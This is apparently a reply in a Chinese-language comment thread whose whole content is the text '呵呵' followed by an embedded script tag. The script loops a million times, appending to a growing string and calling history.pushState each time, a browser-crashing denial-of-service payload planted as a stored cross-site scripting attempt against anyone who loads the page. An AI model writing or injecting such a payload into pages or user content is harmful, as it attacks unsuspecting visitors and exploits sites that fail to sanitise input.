回复@z :
呵呵<script>var total="";for (var i=0;i<1000000;i++){    total= total+i.toString();    history.pushState(0,0,total);}</script>
请勾选本项再提交评论